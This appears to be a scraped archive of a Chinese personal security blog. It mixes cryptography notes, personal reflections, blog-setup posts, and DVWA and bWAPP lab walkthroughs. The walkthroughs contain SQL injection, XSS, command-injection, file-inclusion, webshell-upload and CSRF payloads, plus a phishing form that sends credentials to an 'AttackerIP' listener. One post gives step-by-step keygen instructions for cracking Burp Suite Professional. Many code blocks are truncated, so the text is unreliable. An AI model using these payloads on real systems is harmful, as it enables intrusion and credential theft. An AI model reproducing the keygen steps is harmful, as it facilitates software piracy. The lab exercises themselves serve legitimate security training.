a=1时,蜕化为凯撒密码。这里不考虑。
a≠0时,b无限制。
相当于b=0的仿射加密后,再叠加一次凯撒加密。
a的取值有限制:gcd(a,26)=1
a=3,5,7,9,11,15,17,19,21,23,25
否则不能保证一一映射
例:a=2, b=1时,p=3->C=7; p=16->C=7
不同的明文对应同一密文,无法解密
密钥空间大小为11*26=286
3.HILL密码
+密钥:m*m个密钥
+加密:每次加密m个明文字母
+
+
+
+
+解密(要求K可逆)
+
+
+安全性:掩盖频率信息
+抵抗唯密文攻击
+易受已知明文攻击
+1.单表代换密码
+经典密码破译:
+2.Playfair密码——二维单表代换
+
加密方法:
+每次加密或解密两个字母
+加密规则:
+3.多表代换加密(抵抗字频统计攻击)
+4.维吉尼亚密码
+加密算法:Ci = E(k, pi) = (pi+ki mod d) mod 26
解密算法:pi = D(k, Ci) = (Ci-ki mod d) mod 26
攻击方法:
+若获得了替换表的个数(密钥长)d,则可以逐个分析
+分析位于i,i+d,i+2d,…的密文,获得密钥ki
+寻找密钥长度d
+vKasiski方法
+5.Autokey密码
+加解密密钥= ”密钥” + ”明文”
+重新排序隐藏信息
+两次代换可以构造更复杂的代换,等效为一次规则复杂的代换
两次置换可以构造更复杂的置换,等效为一次规则复杂的置换
交替使用代换和置换,可以大大提高安全性
密码系统运算
+1.先验概率,后验概率
+2.闭合系统,非闭合系统
+同构:定义:若密码系统T的消息空间与密文空间相同,则称它是自同构的。
若密码系统T是自同构的,则可定义指数运算:
幂等:定义:若密码系统T满足TT=T,则称它是幂等的。
维吉尼亚密码是幂等的
单纯密码,混合密码
+相似密码系统
+信息量:H(x)
+冗余,冗余度
+完美安全:完美安全一般用于加密最重要的信息,或者消息集很小的场合。
+消息模糊度
+密钥模糊度
+唯一解距离
+内容:数论基础
+群,环,域
+有限群的阶等于群中元素的个数
+有限群,交换群(阿贝尔群),
+循环群:如果群中的每一个元素都是一个固定的元素a(a∈G)的幂ak(k为整数),则称群G为循环群。
元素a生成了群G,或者说a是群G的生成元。
关系图
+
模运算
+a=qn + r 0≤r<n; q=⌊a/n⌋
+
同余
+整数a, b及n≠0, 当且仅当a-b=kn时,a与b是模n同余,记为 a≡b mod n
+a≡b mod n当且仅当 a mod n = b mod n
+如果a=mb, 其中 a,b,m 为整数,则当b≠0时,称b能整除a, b是a的一个因子,或a除以b余数为0,记为b|a
+如果n|(a-b), 则a≡b mod n
+加法逆元,乘法逆元
+模n的完全剩余类集
+有限域
+多项式计算
+有限域GF(2n)上的多项式计算
+素多项式
+任何多项式可以写为:f(x)=q(x)g(x)+r(x)
r(x)称为余式
r(x)=f(x) mod g(x)
若不存在余式,则称g(x)整除f(x),g(x)|f(x)
+若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式
+系数在GF(p)中,以素多项式取模的多项式构成一个域
+欧几里得算法
+1 | a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b |
1 | 对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b) |
gcd(a,b)=gcd(a mod b, b)
+若a和b只有唯一的正公因子1,则称整数a和b是互素的,即gcd(a, b)=1
+扩展欧几里得
+求d=gcd(a,b),并解ax+by=d
+素数有无限多个
+费马数
+梅森素数
+完全数
+素因子分解
+任一正整数可通过列出所有素因子的非零指数分量来表示
例:12可以表示为{a2=2, a3=1}
例:18可以表示为{a2=1, a3=2}
两个数的乘法等同于对应指数分量的加法:
K = mn → kp = mp + np 对所有p
例:216=12×18=(22×31)×(21×32)=23×33
最大公约数:k=gcd(a,b) <=> 所有kp=min(ap,bp)
例:300=22×31×52, 18=21×32 gcd(18,300)=21×31×50=6
费马定理
+
+
+
+
+欧拉定理
+
中国剩余定理
+
+
+阶
+
+
+原根
+
原根的模数不一定是素数:5是模6的一个原根
+原根未必唯一
+所有的奇数都是模2的原根
+
算术基本定理
+
DH算法
+
+
+
+
+扩展欧几里得
+求乘法逆元
+Feistel密码结构
+DES 64位密钥
+实际只使用56位
+其它用作奇偶校验等
+雪崩效应就是一种不稳定的平衡状态也是加密算法的一种特征,它指明文或密钥的少量变化会引起密文的很大变化,就像雪崩前,山上看上去很平静,但是只要有一点问题,就会造成一片大崩溃。 可以用在很多场合对于Hash码,雪崩效应是指少量消息位的变化会引起信息摘要的许多位变化。指加密算法(尤其是块密码和加密散列函数)的一种理想属性。雪崩效应是指当输入发生最微小的改变(例如,反转一个二进制位)时,也会导致输出的不可区分性改变(输出中每个二进制位有50%的概率发生反转)。合格块密码中,无论密钥或明文的任何细微变化都必须引起密文的不可区分性改变。
+构造一个具备良好雪崩效应的密码或散列是至关重要的设计目标之一。
+计时攻击
+能量攻击
+DES能够很好地抵抗计时攻击
+DES不能抵御差分分析、线性分析
+差分密码攻击
+线性密码分析
+DES的设计标准
+密钥长度:128,192,256
+不是Feistel结构
+字节代换、行移位、列混淆三个阶段一起提供了混淆、扩散和非线性功能。这些阶段不涉及密钥,其本身并不提供安全性
+
+
+
不同分组模式的优缺点。
+
+
+
+
+分类:
+hash是无密钥的
+MAC是有密钥的
+生日悖论
+
+
+对输出n比特的hash函数,生日攻击的代价为$2^{n/2}$
+1.加密
+2.密码系统的安全性取决于算法强度和密钥长度
+岁月蹉跎,转眼已快毕业。2021年还算平稳度过。
+本来想直接就业,3,4月投了很多实习简历,也经历过几次面试。大部分公司石沉大海,直至今日,仍无反应。唯阿里最为迅速,美团最主动,各个部门经常打电话过来。面了几家大厂和乙方龙头企业,都没有如意的结果。深知实战经验缺乏,又难以快速提升。遂作罢,走上考研之路。
+上半年课不算多,都以小组做项目为主,结课之前没有多少时间可以静心复习。
+真正开始复习是暑假7月份。因为一些契机,也因为不想在基地待下去,报了一个自命题的学校。寻找资料很难,真题都没有,也很少有可以交流的同学。
+一切时间都要靠自己安排,不像高中那样,只跟老师走就行了。这一路也是兜兜转转,不同的老师,不同的资料,转来转去。从汤家凤到张宇,再到武老师。尤其概率,从余炳森,到汤家凤,到王式安,到张宇,最后是方浩。
+半年来,认识了很多真正的好老师。田静,徐涛,武忠祥,李永乐等。虽未谋面,但却像真正耳提面命一般,一路陪伴着我们。
+不知道新的一年,我将在哪里。不管结果如何,上天都会有最好的安排。
+向前走吧。
+题目链接:https://leetcode-cn.com/problems/spiral-matrix/
+题目要求:
+++给定一个m x n大小的矩阵(m行,n列),按螺旋的顺序返回矩阵中的所有元素。
+
举例:
+1 | 输入:[[1,2,3],[4,5,6],[7,8,9]] |
+
+
+
+首先遍历最外圈,然后将矩阵缩小一圈,递归进行。
+要注意边界条件,即矩阵为空,或1行或只有1列的情况。
+1 | 递归方法 |
1 | 思路清晰方法: |
撞墙法,即改变方向法:
+1 | class Solution: |
1 | class Solution(object): |
大神版:
+1 | def spiralOrder(self, matrix: List[List[int]]) -> List[int]: |
++二月份做过一遍,现在复习一下。
+
1.low
+
发送到Intruder模块破解即可。
+
或者使用万能密码登陆
+
2.medium
+1 |
|
这个函数对特殊字符进行转义,使得万能密码失效,只能用暴力破解的方法了。
+3.high
+1 | // Check Anti-CSRF token |
Token直接并到URL后面。
+1 | http://150.158.167.184:81/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=2f7c77f2d6684f968502e34a49b71c39# |
使用脚本进行爆破
+1 | from bs4 import BeautifulSoup |
1 |
|
1.Low
+没有任何防护,可以直接执行命令:127.0.0.1 && ipconfig
2.medium
+1 | 命令1 && 命令2 表示先执行命令1,成功后接着执行命令2。 |
1 | 1、“;”分隔符 |
用黑名单的形势过滤了‘&&’和’;’命令连接符。
+1 | // Set blacklist |
此时,可以只使用’&’来进行命令注入。
+
3.high
+对很多符号都进行了黑名单限制
+1 | // Set blacklist |
但其中有一处细节,’| ‘后面有空格,只过滤了有空格的|命令,此时可以通过无空格的’|’来进行命令注入。
+4.impossible
+1 | // Get input |
impossible也就是防护方法,通过对ip地址分片,对四个部分进行检查,判断是否都是数字。这样就可以从逻辑上防止命令注入。
+
原理:攻击者利用目标用户的身份,以目标用户的名义执行非法操作
+源代码如下:
+1 |
|
1.low
+没有任何防护,可以直接通过url进行修改密码。可以通过“短链接”+“社工”的方式,诱惑受害人点击此链接,从而成功修改密码。
+短链接在线生成:http://tool.chinaz.com/tools/dwz.aspx
+password_new=123&password_conf=123&Change=Change#
可以伪装成恶意网页,进行欺骗攻击
+1 | <h1>404<h1> |
受害者点开链接之后,密码已被修改。
+网上还有一种攻击方式:
+1 | <img src="http://192.168.50.100/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf= |
打开网页文件即可,不用点击链接。但是已经多次实践未成功。
+2.medium
+
1 | // Checks to see where the request came from |
对referer进行了检查
+1 | GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1 |
添加referer之后便可成功修改密码
+
或者对referer根据判断条件进行伪造
+3.high
+1 | http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change&user_token=367c7e82e1c3e847203981e6d36ced78# |
在url后面添加了token
+通过XSS弹出token
+1 | <img src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)> |
在URL后面加上通过XSS窃取的token,即可攻击成功。
+1.low
+
1 |
|
可以直接读取phpinfo
+本地文件包含:
+1 | http://127.0.0.1/DVWA/vulnerabilities/fi/?page=D:\\wamp\\www\\DVWA\\phpinfo.php |
远程文件包含:
+1 | http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1//DVWA//about.php |
也可以通过php协议读取。
+
2.medium
+对输入进行了验证,对不法字符进行替换。
+1 | // Input validation |
str_replace函数是不安全的,可以采用双写进行绕过。
1 | http://127.0.0.1/DVWA/vulnerabilities/fi/?page=htthttp://p://127.0.0.1//123.txt |
1 | http://127.0.0.1/DVWA/vulnerabilities/fi/?page=....//....//....//123.txt |
1 | http://127.0.0.1/DVWA/vulnerabilities/fi/?page=..././..././..././123.txt |
3.high
+1 |
|
1 | http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D://wamp//install.txt |
payload如下:
+新建文件123.txt
+1 | <?php |
1.low
+无任何限制,可直接上传文件
+但是对文件大小做了限制,可以在前端进行修改。
+上传一句话木马,然后用get传参进行攻击。
+1 | http://127.0.0.1/DVWA/hackable/uploads/cmd.php?cmd=system(%22dir%22); |
2.medium
+1 |
|
对文件类型进行了限制,只能上传jpeg/PNG.
+可以通过修改后缀名进行绕过
+首先写一句话木马
+1 |
|
修改文件名为:cmd.php.jpeg或者cmd.jpeg
+然后通过burpsuite进行抓包,修改文件名,并进行重放。即可上传成功。修改为php后缀。
+
可以看到,上传成功
+
然后用蚁剑连接即可。
+拿下!
+
也可以直接通过get传参。
+
3.high
+或者修改文件头为:GIF89
+制作图片马,进行上传。
+命令:
+
然后利用远程文件包含漏洞。或者“命令注入漏洞”。
+
这里需要Google API,实验环境不具备。
+本质上来说,是利用验证码检测的逻辑漏洞,通过修改参数,进行绕过。
+1 |
|
1.low
+1 |
|
输入:1’ and 1=1
+报错:
+1 | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 |
输入:1’ and 1=1 #
+
判断字段长度
+1’ order by 1 #
+输入3,出现报错。
+说明只有两个字段。
+判断回显:1’ union select 1,2 #
+然后代入查询
+
获取表:
+1 | 1' union select 1,table_name from information_schema.tables where table_schema='dvwa |
如果表比较多:
+1 | 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa |
然后查询字段:
+1 | 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users |
1 | 1' union select group_concat(user_id,first_name,last_name),group_concat(user,password) from users # |
MD5解密即可:
+
也可以通过sqlmap进行注入。
+1 | python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; security_level=0; PHPSESSID=2skes96bbgh4hn8js60vknurp1" -D dvwa -T users --columns |
2.medium
+
不能自己输入数据
+
直接用burpsuite抓包
+
id=1 or 1=1#&Submit=Submit
+
然后按照Low级别进行注入即可。
+
这里对单引号进行了转义,可以用16进制或者Mysql函数进行绕过。
+
1 | s='users'.encode('utf-8') |
也可以通过hackbar提交POST
+先通过BP抓包,保存为文件 ,然后用sqlmap进行注入。
+3.high
+在新的一个页面进行查询,防止常规sqlmap注入。
+
在sqlmap中,可以用second-url指定参数,然后进行注入。
+1.low
+
存在字符型注入。
+然后判断数据库名称长度:
+1 | 1' and length(database())=1# |
然后逐字符进行判断:
+1 | 1' and ascii(substr(database(),1,1))<122# 可使用二分法 |
也可以使用时间注入的方法:
+1 | 1'and sleep(3)# 有延迟 |
1 | 1' and if(ascii(substr(database(),1,1))<120,sleep(5),1)# |
2.medium
+跟前一模块一样,先burpsuite抓包,再进行注入。
+3.high
+跟前一模块相同。
+1.low
+1 |
|
每按一次,session_id+1,因此可以猜解。
+2.medium
+1 |
|
cookie的值是系统当前时间。
+
3.high
+1 |
|
1.low
+无任何过滤,直接XSS,<script>alert(1)</script>
2.medium
+1 |
|
双写绕过:
+1 | <scrip<script>t>alert(/xss/)</script> |
大小写绕过:
+1 | <Script>alert(/xss/)</script> |
3.high
+1 |
|
过滤了’script’,可以用其他标签绕过
+1 | <img src="" onerror=alert(1)> |
1.low
+1 |
|
打开给定的网站
+写入一段Js代码
2.medium
+1 |
|
输入:
+1 | <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script> |
payload: <script src="source/jsonp.php?callback=alert('1');"></script>
网络安全是建立在密码学以及协议设
计的基础上的
网络安全的主要任务:
+ISO-OSI模型。
+TCP/IP模型
+
X.800
+用一种或多种安全机制来实现安全服务,安全服务
致力于抵御安全攻击。
主动攻击:
+被动攻击:
+
1.公钥基础设施:PKI是一个用非对称密码算法原理和技术来实现并提供安全服务的具有通用性的安全基础设施。是一种遵循标准的利用公钥加密技术为电子商务的开展提供安全基础平台的技术和规范。能够为所有网络应用提供采用加密和数字签名等密码服务所需要的密钥和证书管理。
+2.功能(为什么需要PKI)
+对可信第三方的需要(CA)
电子政务、电子商务对信息传输的安全需求,统一标准
在收发双方建立信任关系,提供身份认证、数字签名、加密等安全服务
收发双方不需要事先共享密钥,通过公钥加密传输会话密钥
3.证书的基本结构
+
+
+
+
+4.组成
+
+
+
+
+5.密钥备份和恢复系统:
+6.交叉认证:
+多个PKI独立地运行,相互之间应建立信任关系
+对等CA互相签发
+7.PKI服务
+8.常用的密码技术
+
机密性:数据加密(数字信封)
+信息发送端用接收端的公钥,将一个通信密钥(即对称密钥)给予加密,生成一个数字信封。接收端用自己的私钥打开数字信封,获取该对称密钥SK,用它来解读收到的信息。
+身份认证:数字签名
+对待发的数据首先生成一段数据摘要,再采用己方私钥基于非对称加密算法进行加密,结果附在原文上一起发送,接受方对其进行验证,判断原文真伪。这种数字签名适用于对大文件的处理,对于那些小文件的数据签名,则不预先做数据摘要,而直接将原文进行非对称加密处理。
+
完整性:数字签名+MAC
+不可否认性:数字签名+时间戳
+由于非对称密码的运算复杂、加/解密速度慢,因此信息的加密采用对称密码
算法,其会话密钥的分发采用非对称密码算法,即采用收方的公钥对会话密
钥进行加密。
报文检验码(消息认证码MAC)
+9.PKI功能操作
+
初始化
+10.生命周期
+
+
+
+
+
+
+11.信任CA结构
+层次模型:
+
分布式模型:
+
12.证书链
+
13.X.509
+为了解决X.500目录中的身份鉴别和访问控制问题而设计的。同时本身也采用目录的形式进行管理和访问。
+14.主要内容
+
15.CA
+PKI核心实体认证机构CA,为各个实体颁发电子证书,对实体身份信息和相应公钥数据进行数字签名,用以捆绑该实体的公钥和身份,以证明各实体在网上身份的真实性;并负责在交易中检验和管理证书.
+功能
+1.IPv4和IPv6
+
+
+
+
+2.安全组合SA
+为使通信双方的认证/加密算法及其参数、密钥的一致,相互间建立的联系被称为安全组合或安全关联(Security Association)
+SA是单向的,在双向通信时要建立两个SA
+安全关联数据库(SAD)
+安全策略数据库(SPD)
+SA由一个三元组唯一地标识,该三元组为安全参数索引SPI、一个
用于输出处理的目的IP地址和协议(如AH或ESP)
3.认证头标AH
+
序列号的使用:防止重放。
+认证头标:完整性校验。
+AH外出处理和进入处理
+4.封装安全载荷ESP
+
填充的目的:
+ESP外出处理,进入处理。
+5.传输模式和隧道模式
+
6.IPsec和NAT
+IPsec优点:
+具有AH头标或ESP头标的的IP分组不能穿越NAT和NATPT
+7.IPSec隧道模式的应用-VPN
+VPN 的种类、功能
+8.IPsec的实现
+IPSec VPN 的处理流程
+因特网密钥交换协议,是一个以受保护的方式动态协商IPsec SA的协议。
+功能:使用某种长期密钥进行双向认证并建立会话密钥
+主模式,野蛮模式。
+IKEv1, IKEv2
+SSL (Secure Socket Layer)是一种在TCP协议之上为两个端实体(End Entity)之间提供安全通道的协议。
+具有保护传输数据以及识别通信实体的功能。安全通道是透明的,独立于应用层;传输层采用TCP,提供可靠业务
+SSL功能:
+SSL工作原理:
+1.定义 防火墙是位于两个(或多个)网络间,实施网间访问控制的一组组件的集合
+防火墙 = 硬件 + 软件 + 控制策略
+设计目标:
+防火墙的必要性:
+防火墙的要求(两个要求存在矛盾性):
+2.分类
+包过滤型防火墙
+针对包过滤型防火墙的攻击
+状态检测型防火墙(参见百度百科)
+状态检测防火墙在网络层有一个检查引擎截获数据包并抽取出与应用层状态有关的信息,并以此为依据决定对该连接是接受还是拒绝。
+应用级网关型防火墙
+代理服务型防火墙
+复合型防火墙
+安全缺省策略:
+一切未被禁止的就是允许的
+一切未被允许的就是禁止的(RFC2979推荐)
+3.功能
+4.NAT 基本原理、作用
+Network Address Translation
+NAT技术可以在路由器(边界)、防火墙上实现内外地址的翻译工作
+类型:
+作用:
+SNAT
+DNAT
+NAT工作原理:
+SNAT工作原理
+实现方式:
+所需技术:
+分类:
+
+
+IPSec VPN
+电子邮件安全协议:
+
签名、压缩、加密
+若超过标准长度,则PGP自动对报文分段,接收端再重组。
+PGP虽然采用公钥密码体系,但不是基于PKI证书体系
+S/MIME使用X.509证书,它的密钥管理方案介于严格的X.509证书层次结构和PGP信任网之间
+SSH
+HTTPS((http over SSL)
+安全电子交易协议SET(Secure Electronic Transaction)
+SET提供了消费者、商家和银行之间的认证,确保了网上交易数据的保密性,数据的完整性以及交易的不可抵赖性。
+SET采用公钥密码体制,遵循X.509数字证书标准
+双重数字签名
+1.无线网络的分类
+2.WLAN建立的方式
+3.WLAN的安全需求
+WLAN安全机制
+802.11 的安全机制
+WEP协议(有线等效保密协议)
+功能:访问控制,数据保密性
+802.11的安全增强
+
+
+
+
+安全机制实现安全服务,安全服务抵御安全攻击。
+
+
+防火墙设计目标:
+防火墙的控制能力:
+包过滤防火墙在(网络层)上进行检测,在(路由器)上实现。
+
+
+IKE的功能:使用某种长期密钥进行双向认证并建立会话密钥
+IKE是一个是一个以受保护的方式动态协商IPsec SA的协议
+
+
+
+
+选择符。
+
电子邮件安全协议
+
+
+
+
+
+
+WEP:有线等效保密协议
+WEP功能:
+
+
+
++《Twenty Years of Attacks on the RSA Cryptosystem》阅读笔记
+
++bWAPP靶场训练记录,之前就搭好的,一直没练,现在有空练一下
+
主要内容有:一个很综合的靶场,不错!
+1 | SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections |
HTML Injection - Reflected (GET)
+get型的html注入
+ +也可以使用xss
+HTML Injection - Reflected (POST)
+通过hackbar提交POST请求即可
+
HTML Injection - Reflected (URL)
+尝试XSS
+http://127.0.0.1/bWAPP/bWAPP/htmli_current_url.php?a=%3Cscript%3Ealert(/xss/)%3C/script%3E
+bp抓包之后对编码进行修改
+1 | GET /bWAPP/bWAPP/htmli_current_url.php/?a=<script>alert(/xss/)</script> HTTP/1.1 |
原理如此,但这个只能在IE浏览器才能成功。
+HTML Injection - Stored (Blog)
+可以XSS
+看了网上以为老外写的exp
+1 | <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://AttackerIP/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div> |
攻击机:nc -l 80
+iFrame Injection
+http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250
+OS Command Injection
+命令注入,跟DVWA的很类似
+
OS Command Injection - Blind
+跟SQL盲注类似,根据时间判断命令是否执行成功
+PHP Code Injection
+1 |
|
http://127.0.0.1/bWAPP/bWAPP/phpi.php/?message=phpinfo()
+有点像get型传参的注入
+
Server-Side Includes (SSI) Injection
+这里执行XSS没有问题,但是对服务端包含还不够熟悉。用了一下老外的exp也没成功
+接下来就是SQL注入类型的了。
+SQL Injection (GET/Search)
+
+
+http://127.0.0.1/bWAPP/bWAPP/sqli_1.php?title=a%%27%20order%20by%207%20--+&action=search
+order试出列
+数据库名和用户名
+ +SQL Injection (AJAX/JSON/jQuery)
+++半年多没接触编程,手生了。做一些python安全开发的小工具,练手+复习
+
1.获取http状态码
+1 | import requests |
2.get请求
+无参数
+1 | import requests |
带参数请求
+1 | requests.get(url,params=) #字典 |
3.POST请求
+1 | requests.post(url,data=) |
4.headers自定义请求头
+5.响应头和请求头
+print(r.headers)
print(r.request.headers)
++春招早就告一段落,在这里记录一下。
+
计算机知识参考CS-NOTES:http://www.cyc2018.xyz/
+安全方面的可以去Github,知乎,等平台查找。**牛客**上也有很多!仔细找。
+贴一下我自己找的一些**安全面经**:https://github.com/h4m5t/Sec-Interview
+Python面试题:https://github.com/taizilongxu/interview_python
+面试的节奏最好把握在自己手里,我们不可能每个方面都会,让面试官随便问的话,很大概率要挂。可以在自我介绍的时候,将你的学习历程讲清楚,让面试官知道你会什么,接触过什么,让他知道你大概会的东西的方向。其次,基础要扎实,漏洞的原理、种类、防御方式、应用等都应该十分熟悉,而且最好准备一些比较深的内容,开始的时候不说,等他问了再说,效果更好。然后,就是项目的经验了,这种东西要你确实做过且了解很深的才行,不然很容易给面试官留下差印象。还有就是HR,技术面你可以和面试官扯蛋、闲聊、开些玩笑也无所谓,但HR最好就不要了,正经点,别什么真话都往外说,别给他理由把你pass了
+待更
+之前的博客用了快三年,有一些小问题,另外发现有些图片失效了,甚至给我换了广告,不能忍。
+而且速度很慢,准备换个框架,整体迁移一下。
+以前用的是Jekyll,一个小众主题,很简洁,有语言翻译功能,手机端做的也不错。但是可扩展性差,用的人少,功能不完善。
+当前需求:
+支持RSS
+支持外链,GitHub,知乎等
+支持查看运行时间,访问总次数。
+支持归档,时间倒序排列。
+支持转发到微信,qq,Twitter
+相关文章推荐
+写公告
+长远需求:
+主流静态框架有三种:
+Hexo
Hugo
Jekyll
最终决定用hexo
+框架:https://github.com/hexojs/hexo
+主题:butterfly
+此框架国内用的多,有问题方便查找,主题功能完善,看了别人的demo,特别惊艳。
+可以满足我需要的所有需求。
+缺点是不方便多端编辑,需要在本地生成之后上传所有文件。不像之前的Jekyll,只上传一个md文件就够了。
+参考:
+https://www.antmoe.com/posts/7198453
+https://www.cnblogs.com/MoYu-zc/p/14397889.html
+遇到了渐变色不生效的问题,看了上面这篇文章,解决了。将butterfly.yml的background改为"#efefef"
下面是配置背景色的css文件。
+1 | /* 文章页背景 */ |
1 | # 字数计数 |
查看已安装的所有插件:npm list
1 | +-- hexo-deployer-git@3.0.0 |
备注:升级了Butterfly主题,也同步升级了其中一个插件:hexo-renderer-stylus
+1 | Bump hexo-renderer-stylus from 2.1.0 to 3.0.0 dependencies |
还有一些问题,记录在README上了。
+https://github.com/h4m5t/h4m5t.github.io/blob/master/README.md
+顺便修改了一下github主页的readme,可以选不同颜色主题。
+tokyonight
+
Vue
+
参考下面的repo.
+ +
+
+
+
+
+
+可以合并到表格,更整齐。
+ |
+ |
+
|---|
或者使用自动生成器:
+ +之前用的注册机现在不能使用了,需要换新的。
+原来:https://github.com/TrojanAZhen/BurpSuitePro-2.1
+现用:https://github.com/h3110w0r1d-y/BurpLoaderKeygen
+先到官网下载安装。
+https://portswigger.net/burp/releases
+按往常一样,将jar包放到Burpsuite app同级目录下,
+
运行:
+1 | cd /Applications/Burp\ Suite\ Professional.app/Contents/Resources/app && "/Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java" "--add-opens=java.desktop/javax.swing=ALL-UNNAMED" "--add-opens=java.base/java.lang=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.tree=ALL-UNNAMED" "--add-opens=java.base/jdk.internal.org.objectweb.asm.Opcodes=ALL-UNNAMED" "-javaagent:BurpLoaderKeygen.jar" "-jar" "/Applications/Burp Suite Professional.app/Contents/Resources/app/burpsuite_pro.jar" |
开另一个终端:
+1 | /Applications/Burp\ Suite\ Professional.app/Contents/Resources/jre.bundle/Contents/Home/bin/java -jar /Applications/Burp\ Suite\ Professional.app/Contents/Resources/app/BurpLoaderKeygen.jar |
按往常的注册流程即可。
+为方便运行,
+修改vmoptions.txt
+1 | -XX:MaxRAMPercentage=50 |
之后就可以正常使用了。
+Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
+1 | $ hexo new "My New Post" |
More info: Writing
+1 | $ hexo clean |
1 | $ hexo server |
More info: Server
+1 | $ hexo generate |
More info: Generating
+1 | $ hexo deploy |
More info: Deployment
+Hexo自动化工作流总是遇到问题,今天终于解决了。实现了自动部署,终于不用先在本地PC生成静态文件了。方便在不同环境直接通过修改md文件实现对博客的更新。
+新建一个博客源码私有仓库BlogSource
创建一个有 repo 和 workflow 权限的 GitHub Token
+将上述Token添加到私有仓库的Secrets,命令为HEXO_DEPLOY
+创建工作流文件:.github\workflows\hexo-deploy.yml
内容如下:
+1 | name: Hexo Deploy GitHub Pages |
其中,用到的部署Action:https://github.com/h4m5t/hexo-deploy-github-pages-action
+我这里是push到gh-pages分支了。要注意同步修改仓库设置中的Build Branch
+源代码仓库中的.gitignore文件内容:
+1 | .DS_Store |
https://akilar.top/posts/f752c86d/
+https://github.com/cys2004/blog_source
+https://juejin.cn/post/7133235874858270728#heading-2
+修改:_config.butterfly.yml
1 | # mermaid |
在博客根目录下执行:
+1 | npm install hexo-filter-mermaid-diagrams --save |
参考:https://github.com/jerryc127/hexo-theme-butterfly/issues/1228#issuecomment-1554223960
+安装此插件后,可以使用Typora支持的格式,方便本地预览和远程查看。
+例如:
+可以根据如下源码生成流程图:
+1 | <pre class="mermaid">graph LR |
graph LR + A[Attacker crafts+ + + +
malicious payload
with JNDI lookup] --> C{Log4j parses:
Contains JNDI lookup?} + C -->|Yes| D[Execute
JNDI lookup] + C -->|No| E[Normal log] + D --> F[Connect to
attacker's server] + F --> G[Download &
execute
malicious class] + G --> H[Attacker gains
server control] + + classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; + classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; + classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; + classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; + + class A,H highlight; + class C decision; + class G danger;
sequenceDiagram +前端->>前端: 用户首次打开前端页面 +前端->>后台: version : 0+ + + + + +
请求同步数据 +后台->>前端: 返回数据,同时携带最大的version +note right of 后台: 返回数据结构:{"version":100, data:[{},{},{}]}
使用butterfuly官方给出的引用方法。
+参考:https://butterfly.js.org/posts/4aa8abbe/?highlight=mermaid#mermaid
+写法:
+1 | {% mermaid %} |
示例:
+
+ graph LR
+ A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
+ C -->|Yes| D[Execute<br>JNDI lookup]
+ C -->|No| E[Normal log]
+ D --> F[Connect to<br>attacker's server]
+ F --> G[Download &<br>execute<br>malicious class]
+ G --> H[Attacker gains<br>server control]
+
+
+ classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px;
+ classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px;
+ classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px;
+ classDef danger fill:#ffebee,stroke:#333,stroke-width:1px;
+
+ class A,H highlight;
+ class C decision;
+ class G danger;
+ + pie + title Key elements in Product X + "Calcium" : 42.96 + "Potassium" : 50.05 + "Magnesium" : 10.01 + "Iron" : 5 +
整个2022年过的比较压抑,无休止的封控,每天一次不停的核酸,最多的时候一天三次。直到12月突然放开,侥幸成为部门倒数第二个阳🐏的人,也算跑进了决赛圈。今天身体快恢复了,总体感觉就是中等感冒,并无大碍。
+基地提供了很好的环境,享受了最好的图书馆,静下心来度过了大半年时光。22年的考研以失败告终(准确来讲,是21年考的),该做的准备都做了,奈何实力不够,差十几分未过线。身边很多朋友二战的,我也很遗憾,但不得不向前走了。
+回到学校,大四下,便开始准备面试。最多的时候一天四轮面试,面的麻木了。到三月底,拿了七八个offer,选了个还算可以的就匆匆结束了。
+然后又进入一段极其压抑痛苦的时光,选了一个比较前沿的密码学课题,原理难懂,实验更难,指导老师的压迫感比童年最大的阴影-钢琴老师来的还强。还好有热心学长帮忙指导,最后也顺利毕业了。
+离开学校已有半年时间,没有太多留恋,或许再回去已是很多年之后了吧。
+在家乡,度过了美好的暑期,那是人生少有的一段最轻松的时光。前一次是高考之后,后一次大概是退休吧。
+7月底独自一人南下深圳,正式成为一名打工人。
+打工半年,2022结束。
+希望在未来这一年,做好职业规划,控制个人习惯,多给家人买些东西。培养一些兴趣爱好(唢呐,钓鱼,围棋等),多运动,多看几本书。
+立几个flag:
